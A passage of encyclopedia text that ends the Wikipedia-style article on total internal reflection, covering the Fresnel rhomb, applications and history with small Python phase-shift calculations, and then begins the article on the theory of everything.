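        # angle (cmath.sqrt of a negative real returns the +i branch).
        ti = math.radians(theta_i_deg)
        cos_i = math.cos(ti)
        cos_t = cmath.sqrt(1 - (n1 / n2 * math.sin(ti)) ** 2)
        r_s = (n1 * cos_i - n2 * cos_t) / (n1 * cos_i + n2 * cos_t)
        r_p = (n2 * cos_i - n1 * cos_t) / (n2 * cos_i + n1 * cos_t)
        return r_s, r_p

    for theta_i in (50.2, 53.3):                    # the two angles quoted for n = 1.5
        r_s, r_p = reflection_coefficients(1.5, 1.0, theta_i)
        delta_s = -math.degrees(cmath.phase(r_s))   # phase advances, cf. Eqs.(17)-(18)
        delta_p = -math.degrees(cmath.phase(r_p))
        print(abs(r_s), abs(r_p))                   # both 1.0: total reflection
        print(theta_i, round(delta_p - delta_s, 2)) # ~45.0 degrees at both angles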
This device performs the same function as a birefringent quarter-wave plate, but is more achromatic (that is, the phase shift of the rhomb is less sensitive to wavelength). Either device may be used, for instance, to transform linear polarization to circular polarization (which Fresnel also discovered) and conversely.

In Fig.13, δ is computed by a final subtraction; but there are other ways of expressing it. Fresnel himself, in 1823, gave a formula for δ. Born and Wolf (1970, p.50) derive an expression for δ and find its maximum analytically.

For TIR of a beam with finite width, the variation in the phase shift with the angle of incidence gives rise to the Goos–Hänchen effect, which is a lateral shift of the reflected beam within the plane of incidence. This effect applies to linear polarization in the s or p direction. The Imbert–Fedorov effect is an analogous effect for circular or elliptical polarization and produces a shift perpendicular to the plane of incidence.

Applications

Optical fibers exploit total internal reflection to carry signals over long distances with little attenuation. They are used in telecommunication cables, and in image-forming fiberscopes such as colonoscopes.

In the catadioptric Fresnel lens, invented by Augustin-Jean Fresnel for use in lighthouses, the outer prisms use TIR to deflect light from the lamp through a greater angle than would be possible with purely refractive prisms, but with less absorption of light (and less risk of tarnishing) than with conventional mirrors.

Other reflecting prisms that use TIR include the following (with some overlap between the categories):

Image-erecting prisms for binoculars and spotting scopes include paired 45°-90°-45° Porro prisms (Fig.14), the Porro–Abbe prism, the inline Koenig and Abbe–Koenig prisms, and the compact inline Schmidt–Pechan prism. (The last consists of two components, of which one is a kind of Bauernfeind prism, which requires a reflective coating on one of its two reflecting faces, due to a sub-critical angle of incidence.) These prisms have the additional function of folding the optical path from the objective lens to the prime focus, reducing the overall length for a given primary focal length.

A prismatic star diagonal for an astronomical telescope may consist of a single Porro prism (configured for a single reflection, giving a mirror-reversed image) or an Amici roof prism (which gives a non-reversed image).

Roof prisms use TIR at two faces meeting at a sharp 90° angle. This category includes the Koenig, Abbe–Koenig, Schmidt–Pechan, and Amici types (already mentioned), and the roof pentaprism used in SLR cameras; the last of these requires a reflective coating on one face.

A prismatic corner reflector uses three total internal reflections to reverse the direction of incoming light.

The Dove prism gives an inline view with mirror-reversal.

Polarizing prisms: Although the Fresnel rhomb, which converts between linear and elliptical polarization, is not birefringent (doubly refractive), there are other kinds of prisms that combine birefringence with TIR in such a way that light of a particular polarization is totally reflected while light of the orthogonal polarization is at least partly transmitted. Examples include the Nicol prism, Glan–Thompson prism, Glan–Foucault prism (or "Foucault prism"), and Glan–Taylor prism.

Refractometers, which measure refractive indices, often use the critical angle.
Rain sensors for automatic windscreen/windshield wipers have been implemented using the principle that total internal reflection will guide an infrared beam from a source to a detector if the outer surface of the windshield is dry, but any water drops on the surface will divert some of the light.

Edge-lit LED panels, used (e.g.) for backlighting of LCD computer monitors, exploit TIR to confine the LED light to the acrylic glass pane, except that some of the light is scattered by etchings on one side of the pane, giving an approximately uniform luminous emittance.

Total internal reflection microscopy (TIRM) uses the evanescent wave to illuminate small objects close to the reflecting interface. The consequent scattering of the evanescent wave (a form of frustrated TIR) makes the objects appear bright when viewed from the "external" side. In the total internal reflection fluorescence microscope (TIRFM), instead of relying on simple scattering, we choose an evanescent wavelength short enough to cause fluorescence (Fig.15). The high sensitivity of the illumination to the distance from the interface allows measurement of extremely small displacements and forces.

A beam-splitter cube uses frustrated TIR to divide the power of the incoming beam between the transmitted and reflected beams. The width of the air gap (or low-refractive-index gap) between the two prisms can be made adjustable, giving higher transmission and lower reflection for a narrower gap, or higher reflection and lower transmission for a wider gap.

Optical modulation can be accomplished by means of frustrated TIR with a rapidly variable gap. As the transmission coefficient is highly sensitive to the gap width (the function being approximately exponential until the gap is almost closed), this technique can achieve a large dynamic range.

Optical fingerprinting devices have used frustrated TIR to record images of persons' fingerprints without the use of ink (cf. Fig.11).

Gait analysis can be performed by using frustrated TIR with a high-speed camera, to capture and analyze footprints.

A gonioscope, used in optometry and ophthalmology for the diagnosis of glaucoma, suppresses TIR in order to look into the angle between the iris and the cornea. This view is usually blocked by TIR at the cornea-air interface. The gonioscope replaces the air with a higher-index medium, allowing transmission at oblique incidence, typically followed by reflection in a "mirror", which itself may be implemented using TIR.

Some multi-touch interactive tables and whiteboards utilise FTIR to detect fingers touching the screen. An infrared camera is placed behind the screen surface, which is edge-lit by infrared LEDs; when touching the surface FTIR causes some of the infrared light to escape the screen plane, and the camera sees this as bright areas. Computer vision software is then used to translate this into a series of coordinates and gestures.

History

Discovery

The surprisingly comprehensive and largely correct explanations of the rainbow by Theodoric of Freiberg (written between 1304 and 1310) and Kamāl al-Dīn al-Fārisī (completed by 1309), although sometimes mentioned in connection with total internal reflection (TIR), are of dubious relevance because the internal reflection of sunlight in a spherical raindrop is not total. But, according to Carl Benjamin Boyer, Theodoric's treatise on the rainbow also classified optical phenomena under five causes, the last of which was "a total reflection at the boundary of two transparent media".
Theodoric's work was forgotten until it was rediscovered by Giovanni Battista Venturi in 1814.

Theodoric having fallen into obscurity, the discovery of TIR was generally attributed to Johannes Kepler, who published his findings in his Dioptrice in 1611. Although Kepler failed to find the true law of refraction, he showed by experiment that for air-to-glass incidence, the incident and refracted rays rotated in the same sense about the point of incidence, and that as the angle of incidence varied through ±90°, the angle of refraction (as we now call it) varied through ±42°. He was also aware that the incident and refracted rays were interchangeable. But these observations did not cover the case of a ray incident from glass to air at an angle beyond 42°, and Kepler promptly concluded that such a ray could only be reflected.

René Descartes rediscovered the law of refraction and published it in his Dioptrique of 1637. In the same work he mentioned the senses of rotation of the incident and refracted rays and the condition of TIR. But he neglected to discuss the limiting case, and consequently failed to give an expression for the critical angle, although he could easily have done so.

Huygens and Newton: Rival explanations

Christiaan Huygens, in his Treatise on Light (1690), paid much attention to the threshold at which the incident ray is "unable to penetrate into the other transparent substance". Although he gave neither a name nor an algebraic expression for the critical angle, he gave numerical examples for glass-to-air and water-to-air incidence, noted the large change in the angle of refraction for a small change in the angle of incidence near the critical angle, and cited this as the cause of the rapid increase in brightness of the reflected ray as the refracted ray approaches the tangent to the interface. Huygens' insight is confirmed by modern theory: in Eqs.(13) and (15) above, there is nothing to say that the reflection coefficients increase exceptionally steeply as θt approaches 90°, except that, according to Snell's law, θt itself is an increasingly steep function of θi.

Huygens offered an explanation of TIR within the same framework as his explanations of the laws of rectilinear propagation, reflection, ordinary refraction, and even the extraordinary refraction of "Iceland crystal" (calcite). That framework rested on two premises: first, every point crossed by a propagating wavefront becomes a source of secondary wavefronts ("Huygens' principle"); and second, given an initial wavefront, any subsequent position of the wavefront is the envelope (common tangent surface) of all the secondary wavefronts emitted from the initial position. All cases of reflection or refraction by a surface are then explained simply by considering the secondary waves emitted from that surface. In the case of refraction from a medium of slower propagation to a medium of faster propagation, there is a certain obliquity of incidence beyond which it is impossible for the secondary wavefronts to form a common tangent in the second medium; this is what we now call the critical angle. As the incident wavefront approaches this critical obliquity, the refracted wavefront becomes concentrated against the refracting surface, augmenting the secondary waves that produce the reflection back into the first medium.

Huygens' system even accommodated partial reflection at the interface between different media, albeit vaguely, by analogy with the laws of collisions between particles of different sizes.
However, as long as the wave theory continued to assume longitudinal waves, it had no chance of accommodating polarization, hence no chance of explaining the polarization-dependence of extraordinary refraction, or of the partial reflection coefficient, or of the phase shift in TIR. Isaac Newton rejected the wave explanation of rectilinear propagation, believing that if light consisted of waves, it would "bend and spread every way" into the shadows. His corpuscular theory of light explained rectilinear propagation more simply, and it accounted for the ordinary laws of refraction and reflection, including TIR, on the hypothesis that the corpuscles of light were subject to a force acting perpendicular to the interface. In this model, for dense-to-rare incidence, the force was an attraction back towards the denser medium, and the critical angle was the angle of incidence at which the normal velocity of the approaching corpuscle was just enough to reach the far side of the force field; at more oblique incidence, the corpuscle would be turned back. Newton gave what amounts to a formula for the critical angle, albeit in words: "as the Sines are which measure the Refraction, so is the Sine of Incidence at which the total Reflexion begins, to the Radius of the Circle". Newton went beyond Huygens in two ways. First, not surprisingly, Newton pointed out the relationship between TIR and dispersion: when a beam of white light approaches a glass-to-air interface at increasing obliquity, the most strongly-refracted rays (violet) are the first to be "taken out" by "total Reflexion", followed by the less-refracted rays. Second, he observed that total reflection could be frustrated (as we now say) by laying together two prisms, one plane and the other slightly convex; and he explained this simply by noting that the corpuscles would be attracted not only to the first prism, but also to the second. In two other ways, however, Newton's system was less coherent. First, his explanation of partial reflection depended not only on the supposed forces of attraction between corpuscles and media, but also on the more nebulous hypothesis of "Fits of easy Reflexion" and "Fits of easy Transmission". Second, although his corpuscles could conceivably have "sides" or "poles", whose orientations could conceivably determine whether the corpuscles suffered ordinary or extraordinary refraction in "Island-Crystal", his geometric description of the extraordinary refraction was theoretically unsupported and empirically inaccurate. Laplace, Malus, and attenuated total reflectance (ATR) William Hyde Wollaston, in the first of a pair of papers read to the Royal Society of London in 1802, reported his invention of a refractometer based on the critical angle of incidence from an internal medium of known "refractive power" (refractive index) to an external medium whose index was to be measured. With this device, Wollaston measured the "refractive powers" of numerous materials, some of which were too opaque to permit direct measurement of an angle of refraction. Translations of his papers were published in France in 1803, and apparently came to the attention of Pierre-Simon Laplace. According to Laplace's elaboration of Newton's theory of refraction, a corpuscle incident on a plane interface between two homogeneous isotropic media was subject to a force field that was symmetrical about the interface. 
If both media were transparent, total reflection would occur if the corpuscle were turned back before it exited the field in the second medium. But if the second medium were opaque, reflection would not be total unless the corpuscle were turned back before it left the first medium; this required a larger critical angle than the one given by Snell's law, and consequently impugned the validity of Wollaston's method for opaque media. Laplace combined the two cases into a single formula for the relative refractive index in terms of the critical angle (minimum angle of incidence for TIR). The formula contained a parameter which took one value for a transparent external medium and another value for an opaque external medium. Laplace's theory further predicted a relationship between refractive index and density for a given substance.

In 1807, Laplace's theory was tested experimentally by his protégé, Étienne-Louis Malus. Taking Laplace's formula for the refractive index as given, and using it to measure the refractive index of beeswax in the liquid (transparent) state and the solid (opaque) state at various temperatures (hence various densities), Malus verified Laplace's relationship between refractive index and density.

But Laplace's theory implied that if the angle of incidence exceeded his modified critical angle, the reflection would be total even if the external medium was absorbent. Clearly this was wrong: in Eqs.(11) and (12) above, there is no threshold value of the angle θi beyond which κ becomes infinite; so the penetration depth of the evanescent wave (1/κ) is always non-zero, and the external medium, if it is at all lossy, will attenuate the reflection. As to why Malus apparently observed such an angle for opaque wax, we must infer that there was a certain angle beyond which the attenuation of the reflection was so small that ATR was visually indistinguishable from TIR.

Fresnel and the phase shift

Fresnel came to the study of total internal reflection through his research on polarization. In 1811, François Arago discovered that polarized light was apparently "depolarized" in an orientation-dependent and color-dependent manner when passed through a slice of doubly-refractive crystal: the emerging light showed colors when viewed through an analyzer (second polarizer). Chromatic polarization, as this phenomenon came to be called, was more thoroughly investigated in 1812 by Jean-Baptiste Biot. In 1813, Biot established that one case studied by Arago, namely quartz cut perpendicular to its optic axis, was actually a gradual rotation of the plane of polarization with distance.

In 1816, Fresnel offered his first attempt at a wave-based theory of chromatic polarization. Without (yet) explicitly invoking transverse waves, his theory treated the light as consisting of two perpendicularly polarized components. In 1817 he noticed that plane-polarized light seemed to be partly depolarized by total internal reflection, if initially polarized at an acute angle to the plane of incidence. By including total internal reflection in a chromatic-polarization experiment, he found that the apparently depolarized light was a mixture of components polarized parallel and perpendicular to the plane of incidence, and that the total reflection introduced a phase difference between them. Choosing an appropriate angle of incidence (not yet exactly specified) gave a phase difference of 1/8 of a cycle. Two such reflections from the "parallel faces" of "two coupled prisms" gave a phase difference of 1/4 of a cycle.
In that case, if the light was initially polarized at 45° to the plane of incidence and reflection, it appeared to be completely depolarized after the two reflections. These findings were reported in a memoir submitted and read to the French Academy of Sciences in November 1817. In 1821, Fresnel derived formulae equivalent to his sine and tangent laws (Eqs.() and (), above) by modeling light waves as transverse elastic waves with vibrations perpendicular to what had previously been called the plane of polarization. Using old experimental data, he promptly confirmed that the equations correctly predicted the direction of polarization of the reflected beam when the incident beam was polarized at 45° to the plane of incidence, for light incident from air onto glass or water. The experimental confirmation was reported in a "postscript" to the work in which Fresnel expounded his mature theory of chromatic polarization, introducing transverse waves. Details of the derivation were given later, in a memoir read to the academy in January 1823. The derivation combined conservation of energy with continuity of the tangential vibration at the interface, but failed to allow for any condition on the normal component of vibration. Meanwhile, in a memoir submitted in December 1822, Fresnel coined the terms linear polarization, circular polarization, and elliptical polarization. For circular polarization, the two perpendicular components were a quarter-cycle (±90°) out of phase. The new terminology was useful in the memoir of January 1823, containing the detailed derivations of the sine and tangent laws: in that same memoir, Fresnel found that for angles of incidence greater than the critical angle, the resulting reflection coefficients were complex with unit magnitude. Noting that the magnitude represented the amplitude ratio as usual, he guessed that the argument represented the phase shift, and verified the hypothesis by experiment. The verification involved calculating the angle of incidence that would introduce a total phase difference of 90° between the s and p components, for various numbers of total internal reflections at that angle (generally there were two solutions), subjecting light to that number of total internal reflections at that angle of incidence, with an initial linear polarization at 45° to the plane of incidence, and checking that the final polarization was circular. This procedure was necessary because, with the technology of the time, one could not measure the s and p phase-shifts directly, and one could not measure an arbitrary degree of ellipticality of polarization, such as might be caused by the difference between the phase shifts. But one could verify that the polarization was circular, because the brightness of the light was then insensitive to the orientation of the analyzer. For glass with a refractive index of 1.51, Fresnel calculated that a 45° phase difference between the two reflection coefficients (hence a 90° difference after two reflections) required an angle of incidence of 48°37' or 54°37'. He cut a rhomb to the latter angle and found that it performed as expected. Thus the specification of the Fresnel rhomb was completed. Similarly, Fresnel calculated and verified the angle of incidence that would give a 90° phase difference after three reflections at the same angle, and four reflections at the same angle. 
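Fresnel's verification procedure is easy to re-enact numerically (as a reconstruction for illustration; Fresnel, of course, worked analytically). The Python sketch below finds, for glass of index 1.51, the two incidence angles at which the relative phase shift per reflection equals 90°/N, for N = 2, 3, and 4 reflections; for N = 2 it returns approximately 48.62° and 54.62°, i.e. Fresnel's 48°37' and 54°37':

    import math

    def delta_deg(n, theta_deg):
        # Relative phase advance delta_p - delta_s per total internal reflection,
        # from Eqs.(17) and (18), with n the relative refractive index.
        t = math.radians(theta_deg)
        q = math.sqrt((n * math.sin(t)) ** 2 - 1.0)
        return math.degrees(2 * math.atan(n * q / math.cos(t))
                            - 2 * math.atan(q / (n * math.cos(t))))

    def solutions(n, target_deg):
        # delta rises from 0 at the critical angle, peaks, and falls back to 0
        # at 90 degrees, so there are generally two solutions; bracket each
        # side of the peak and refine by plain bisection.
        theta_c = math.degrees(math.asin(1.0 / n))
        grid = [theta_c + k * (90.0 - theta_c) / 2000.0 for k in range(1, 2000)]
        peak = max(grid, key=lambda th: delta_deg(n, th))
        roots = []
        for lo, hi in ((grid[0], peak), (peak, grid[-1])):
            if (delta_deg(n, lo) - target_deg) * (delta_deg(n, hi) - target_deg) < 0:
                for _ in range(60):
                    mid = 0.5 * (lo + hi)
                    if (delta_deg(n, lo) - target_deg) * (delta_deg(n, mid) - target_deg) > 0:
                        lo = mid
                    else:
                        hi = mid
                roots.append(round(0.5 * (lo + hi), 2))
        return roots

    for reflections in (2, 3, 4):
        print(reflections, solutions(1.51, 90.0 / reflections))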
In each case there were two solutions, and in each case he reported that the larger angle of incidence gave an accurate circular polarization (for an initial linear polarization at 45° to the plane of reflection). For the case of three reflections he also tested the smaller angle, but found that it gave some coloration due to the proximity of the critical angle and its slight dependence on wavelength. (Compare Fig.13 above, which shows that the phase difference is more sensitive to the refractive index for smaller angles of incidence.) For added confidence, Fresnel predicted and verified that four total internal reflections at 68°27' would give an accurate circular polarization if two of the reflections had water as the external medium while the other two had air, but not if the reflecting surfaces were all wet or all dry. Fresnel's deduction of the phase shift in TIR is thought to have been the first occasion on which a physical meaning was attached to the argument of a complex number. Although this reasoning was applied without the benefit of knowing that light waves were electromagnetic, it passed the test of experiment, and survived remarkably intact after James Clerk Maxwell changed the presumed nature of the waves. Meanwhile, Fresnel's success inspired James MacCullagh and Augustin-Louis Cauchy, beginning in 1836, to analyze reflection from metals by using the Fresnel equations with a complex refractive index. The imaginary part of the complex index represents absorption. The term critical angle, used for convenience in the above narrative, is anachronistic: it apparently dates from 1873. In the 20th century, quantum electrodynamics reinterpreted the amplitude of an electromagnetic wave in terms of the probability of finding a photon. In this framework, partial transmission and frustrated TIR concern the probability of a photon crossing a boundary, and attenuated total reflectance concerns the probability of a photon being absorbed on the other side. Research into the more subtle aspects of the phase shift in TIR, including the Goos–Hänchen and Imbert–Fedorov effects and their quantum interpretations, has continued into the 21st century. Gallery
Physical sciences
Optics
Physics
30436
https://en.wikipedia.org/wiki/Theory%20of%20everything
Theory of everything
A theory of everything (TOE), final theory, ultimate theory, unified field theory, or master theory is a hypothetical singular, all-encompassing, coherent theoretical framework of physics that fully explains and links together all aspects of the universe. Finding a theory of everything is one of the major unsolved problems in physics.

Over the past few centuries, two theoretical frameworks have been developed that, together, most closely resemble a theory of everything. These two theories upon which all modern physics rests are general relativity and quantum mechanics. General relativity is a theoretical framework that only focuses on gravity for understanding the universe in regions of both large scale and high mass: planets, stars, galaxies, clusters of galaxies, etc. On the other hand, quantum mechanics is a theoretical framework that focuses primarily on three non-gravitational forces for understanding the universe in regions of both very small scale and low mass: subatomic particles, atoms, and molecules. Quantum mechanics successfully implemented the Standard Model that describes the three non-gravitational forces: strong nuclear, weak nuclear, and electromagnetic force – as well as all observed elementary particles.

General relativity and quantum mechanics have been repeatedly validated in their separate fields of relevance. Since the usual domains of applicability of general relativity and quantum mechanics are so different, most situations require that only one of the two theories be used. The two theories are considered incompatible in regions of extremely small scale – the Planck scale – such as those that exist within a black hole or during the beginning stages of the universe (i.e., the moment immediately following the Big Bang). To resolve the incompatibility, a theoretical framework revealing a deeper underlying reality, unifying gravity with the other three interactions, must be discovered to harmoniously integrate the realms of general relativity and quantum mechanics into a seamless whole: a theory of everything may be defined as a comprehensive theory that, in principle, would be capable of describing all physical phenomena in the universe.

In pursuit of this goal, quantum gravity has become one area of active research. One example is string theory, which evolved into a candidate for the theory of everything, but not without drawbacks (most notably, its apparent lack of currently testable predictions) and controversy. String theory posits that at the beginning of the universe (up to 10⁻⁴³ seconds after the Big Bang), the four fundamental forces were once a single fundamental force. According to string theory, every particle in the universe, at its most ultramicroscopic level (Planck length), consists of varying combinations of vibrating strings (or strands) with preferred patterns of vibration. String theory further claims that it is through these specific oscillatory patterns of strings that a particle of unique mass and force charge is created (that is to say, the electron is a type of string that vibrates one way, while the up quark is a type of string vibrating another way, and so forth). String theory/M-theory proposes six or seven dimensions of spacetime in addition to the four common dimensions for a ten- or eleven-dimensional spacetime.

Name

Initially, the term theory of everything was used with an ironic reference to various overgeneralized theories.
For example, a grandfather of Ijon Tichy – a character from a cycle of Stanisław Lem's science fiction stories of the 1960s – was known to work on the "General Theory of Everything". Physicist Harald Fritzsch used the term in his 1977 lectures in Varenna. Physicist John Ellis claims to have introduced the acronym "TOE" into the technical literature in an article in Nature in 1986. Over time, the term stuck in popularizations of theoretical physics research. Historical antecedents Antiquity to 19th century Many ancient cultures such as Babylonian astronomers and Indian astronomy studied the pattern of the Seven Sacred Luminaires/Classical Planets against the background of stars, with their interest being to relate celestial movement to human events (astrology), and the goal being to predict events by recording events against a time measure and then look for recurrent patterns. The debate between the universe having either a beginning or eternal cycles can be traced to ancient Babylonia. Hindu cosmology posits that time is infinite with a cyclic universe, where the current universe was preceded and will be followed by an infinite number of universes. Time scales mentioned in Hindu cosmology correspond to those of modern scientific cosmology. Its cycles run from our ordinary day and night to a day and night of Brahma, 8.64 billion years long. The natural philosophy of atomism appeared in several ancient traditions. In ancient Greek philosophy, the pre-Socratic philosophers speculated that the apparent diversity of observed phenomena was due to a single type of interaction, namely the motions and collisions of atoms. The concept of 'atom' proposed by Democritus was an early philosophical attempt to unify phenomena observed in nature. The concept of 'atom' also appeared in the Nyaya-Vaisheshika school of ancient Indian philosophy. Archimedes was possibly the first philosopher to have described nature with axioms (or principles) and then deduce new results from them. Any "theory of everything" is similarly expected to be based on axioms and to deduce all observable phenomena from them. Following earlier atomistic thought, the mechanical philosophy of the 17th century posited that all forces could be ultimately reduced to contact forces between the atoms, then imagined as tiny solid particles. In the late 17th century, Isaac Newton's description of the long-distance force of gravity implied that not all forces in nature result from things coming into contact. Newton's work in his Mathematical Principles of Natural Philosophy dealt with this in a further example of unification, in this case unifying Galileo's work on terrestrial gravity, Kepler's laws of planetary motion and the phenomenon of tides by explaining these apparent actions at a distance under one single law: the law of universal gravitation. Newton achieved the first great unification in physics, and he further is credited with laying the foundations of future endeavors for a grand unified theory. In 1814, building on these results, Laplace famously suggested that a sufficiently powerful intellect could, if it knew the position and velocity of every particle at a given time, along with the laws of nature, calculate the position of any particle at any other time: Laplace thus envisaged a combination of gravitation and mechanics as a theory of everything. 
Modern quantum mechanics implies that uncertainty is inescapable, and thus that Laplace's vision has to be amended: a theory of everything must include gravitation and quantum mechanics. Even ignoring quantum mechanics, chaos theory is sufficient to guarantee that the future of any sufficiently complex mechanical or astronomical system is unpredictable. In 1820, Hans Christian Ørsted discovered a connection between electricity and magnetism, triggering decades of work that culminated in 1865, in James Clerk Maxwell's theory of electromagnetism, which achieved the second great unification in physics. During the 19th and early 20th centuries, it gradually became apparent that many common examples of forces – contact forces, elasticity, viscosity, friction, and pressure – result from electrical interactions between the smallest particles of matter. In his experiments of 1849–1850, Michael Faraday was the first to search for a unification of gravity with electricity and magnetism. However, he found no connection. In 1900, David Hilbert published a famous list of mathematical problems. In Hilbert's sixth problem, he challenged researchers to find an axiomatic basis to all of physics. In this problem he thus asked for what today would be called a theory of everything. Early 20th century In the late 1920s, the then new quantum mechanics showed that the chemical bonds between atoms were examples of (quantum) electrical forces, justifying Dirac's boast that "the underlying physical laws necessary for the mathematical theory of a large part of physics and the whole of chemistry are thus completely known". After 1915, when Albert Einstein published the theory of gravity (general relativity), the search for a unified field theory combining gravity with electromagnetism began with a renewed interest. In Einstein's day, the strong and the weak forces had not yet been discovered, yet he found the potential existence of two other distinct forces, gravity and electromagnetism, far more alluring. This launched his 40-year voyage in search of the so-called "unified field theory" that he hoped would show that these two forces are really manifestations of one grand, underlying principle. During the last few decades of his life, this ambition alienated Einstein from the rest of mainstream of physics, as the mainstream was instead far more excited about the emerging framework of quantum mechanics. Einstein wrote to a friend in the early 1940s, "I have become a lonely old chap who is mainly known because he doesn't wear socks and who is exhibited as a curiosity on special occasions." Prominent contributors were Gunnar Nordström, Hermann Weyl, Arthur Eddington, David Hilbert, Theodor Kaluza, Oskar Klein (see Kaluza–Klein theory), and most notably, Albert Einstein and his collaborators. Einstein searched in earnest for, but ultimately failed to find, a unifying theory (see Einstein–Maxwell–Dirac equations). Late 20th century and the nuclear interactions In the 20th century, the search for a unifying theory was interrupted by the discovery of the strong and weak nuclear forces, which differ both from gravity and from electromagnetism. A further hurdle was the acceptance that in a theory of everything, quantum mechanics had to be incorporated from the outset, rather than emerging as a consequence of a deterministic unified theory, as Einstein had hoped. 
Gravity and electromagnetism are able to coexist as entries in a list of classical forces, but for many years it seemed that gravity could not be incorporated into the quantum framework, let alone unified with the other fundamental forces. For this reason, work on unification, for much of the 20th century, focused on understanding the three forces described by quantum mechanics: electromagnetism and the weak and strong forces. The first two were combined in 1967–1968 by Sheldon Glashow, Steven Weinberg, and Abdus Salam into the electroweak force. Electroweak unification is a broken symmetry: the electromagnetic and weak forces appear distinct at low energies because the particles carrying the weak force, the W and Z bosons, have non-zero masses (about 80.4 GeV/c² and 91.2 GeV/c², respectively), whereas the photon, which carries the electromagnetic force, is massless. At higher energies W bosons and Z bosons can be created easily and the unified nature of the force becomes apparent.

While the strong and electroweak forces coexist under the Standard Model of particle physics, they remain distinct. Thus, the pursuit of a theory of everything remained unsuccessful: neither a unification of the strong and electroweak forces – which Laplace would have called 'contact forces' – nor a unification of these forces with gravitation had been achieved.

Modern physics

Conventional sequence of theories

A theory of everything would unify all the fundamental interactions of nature: gravitation, the strong interaction, the weak interaction, and electromagnetism. Because the weak interaction can transform elementary particles from one kind into another, the theory of everything should also predict all the different kinds of particles possible. The usual assumed path of theories is given in the following graph, where each unification step leads one level up on the graph. In this graph, electroweak unification occurs at around 100 GeV, grand unification is predicted to occur at 10¹⁶ GeV, and unification of the GUT force with gravity is expected at the Planck energy, roughly 10¹⁹ GeV.

Several Grand Unified Theories (GUTs) have been proposed to unify electromagnetism and the weak and strong forces. Grand unification would imply the existence of an electronuclear force; it is expected to set in at energies of the order of 10¹⁶ GeV, far greater than could be reached by any currently feasible particle accelerator. Although the simplest grand unified theories have been experimentally ruled out, the idea of a grand unified theory, especially when linked with supersymmetry, remains a favorite candidate in the theoretical physics community. Supersymmetric grand unified theories seem plausible not only for their theoretical "beauty", but because they naturally produce large quantities of dark matter, and because the inflationary force may be related to grand unified theory physics (although it does not seem to form an inevitable part of the theory). Yet grand unified theories are clearly not the final answer; both the current standard model and all proposed GUTs are quantum field theories which require the problematic technique of renormalization to yield sensible answers. This is usually regarded as a sign that these are only effective field theories, omitting crucial phenomena relevant only at very high energies.

The final step in the graph requires resolving the separation between quantum mechanics and gravitation, often equated with general relativity.
Numerous researchers concentrate their efforts on this specific step; nevertheless, no accepted theory of quantum gravity, and thus no accepted theory of everything, has emerged with observational evidence. It is usually assumed that the theory of everything will also solve the remaining problems of grand unified theories. In addition to explaining the forces listed in the graph, a theory of everything may also explain the status of at least two candidate forces suggested by modern cosmology: an inflationary force and dark energy. Furthermore, cosmological experiments also suggest the existence of dark matter, supposedly composed of fundamental particles outside the scheme of the standard model. However, the existence of these forces and particles has not been proven. String theory and M-theory Since the 1990s, some physicists such as Edward Witten believe that 11-dimensional M-theory, which is described in some limits by one of the five perturbative superstring theories, and in another by the maximally-supersymmetric eleven-dimensional supergravity, is the theory of everything. There is no widespread consensus on this issue. One remarkable property of string/M-theory is that seven extra dimensions are required for the theory's consistency, on top of the four dimensions in our universe. In this regard, string theory can be seen as building on the insights of the Kaluza–Klein theory, in which it was realized that applying general relativity to a 5-dimensional universe, with one space dimension small and curled up, looks from the 4-dimensional perspective like the usual general relativity together with Maxwell's electrodynamics. This lent credence to the idea of unifying gauge and gravity interactions, and to extra dimensions, but did not address the detailed experimental requirements. Another important property of string theory is its supersymmetry, which together with extra dimensions are the two main proposals for resolving the hierarchy problem of the standard model, which is (roughly) the question of why gravity is so much weaker than any other force. The extra-dimensional solution involves allowing gravity to propagate into the other dimensions while keeping other forces confined to a 4-dimensional spacetime, an idea that has been realized with explicit stringy mechanisms. Research into string theory has been encouraged by a variety of theoretical and experimental factors. On the experimental side, the particle content of the standard model supplemented with neutrino masses fits into a spinor representation of SO(10), a subgroup of E8 that routinely emerges in string theory, such as in heterotic string theory or (sometimes equivalently) in F-theory. String theory has mechanisms that may explain why fermions come in three hierarchical generations, and explain the mixing rates between quark generations. On the theoretical side, it has begun to address some of the key questions in quantum gravity, such as resolving the black hole information paradox, counting the correct entropy of black holes and allowing for topology-changing processes. It has also led to many insights in pure mathematics and in ordinary, strongly-coupled gauge theory due to the Gauge/String duality. In the late 1990s, it was noted that one major hurdle in this endeavor is that the number of possible 4-dimensional universes is incredibly large. 
The small, "curled up" extra dimensions can be compactified in an enormous number of different ways (one estimate is 10500 ) each of which leads to different properties for the low-energy particles and forces. This array of models is known as the string theory landscape. One proposed solution is that many or all of these possibilities are realized in one or another of a huge number of universes, but that only a small number of them are habitable. Hence what we normally conceive as the fundamental constants of the universe are ultimately the result of the anthropic principle rather than dictated by theory. This has led to criticism of string theory, arguing that it cannot make useful (i.e., original, falsifiable, and verifiable) predictions and regarding it as a pseudoscience/philosophy. Others disagree, and string theory remains an active topic of investigation in theoretical physics. Loop quantum gravity Current research on loop quantum gravity may eventually play a fundamental role in a theory of everything, but that is not its primary aim. Loop quantum gravity also introduces a lower bound on the possible length scales. There have been recent claims that loop quantum gravity may be able to reproduce features resembling the Standard Model. So far only the first generation of fermions (leptons and quarks) with correct parity properties have been modelled by Sundance Bilson-Thompson using preons constituted of braids of spacetime as the building blocks. However, there is no derivation of the Lagrangian that would describe the interactions of such particles, nor is it possible to show that such particles are fermions, nor that the gauge groups or interactions of the Standard Model are realised. Use of quantum computing concepts made it possible to demonstrate that the particles are able to survive quantum fluctuations. This model leads to an interpretation of electric and color charge as topological quantities (electric as number and chirality of twists carried on the individual ribbons and colour as variants of such twisting for fixed electric charge). Bilson-Thompson's original paper suggested that the higher-generation fermions could be represented by more complicated braidings, although explicit constructions of these structures were not given. The electric charge, color, and parity properties of such fermions would arise in the same way as for the first generation. The model was expressly generalized for an infinite number of generations and for the weak force bosons (but not for photons or gluons) in a 2008 paper by Bilson-Thompson, Hackett, Kauffman and Smolin. Other attempts Among other attempts to develop a theory of everything is the theory of causal fermion systems, giving the two current physical theories (general relativity and quantum field theory) as limiting cases. Another theory is called Causal Sets. As some of the approaches mentioned above, its direct goal isn't necessarily to achieve a theory of everything but primarily a working theory of quantum gravity, which might eventually include the standard model and become a candidate for a theory of everything. Its founding principle is that spacetime is fundamentally discrete and that the spacetime events are related by a partial order. This partial order has the physical meaning of the causality relations between relative past and future distinguishing spacetime events. 
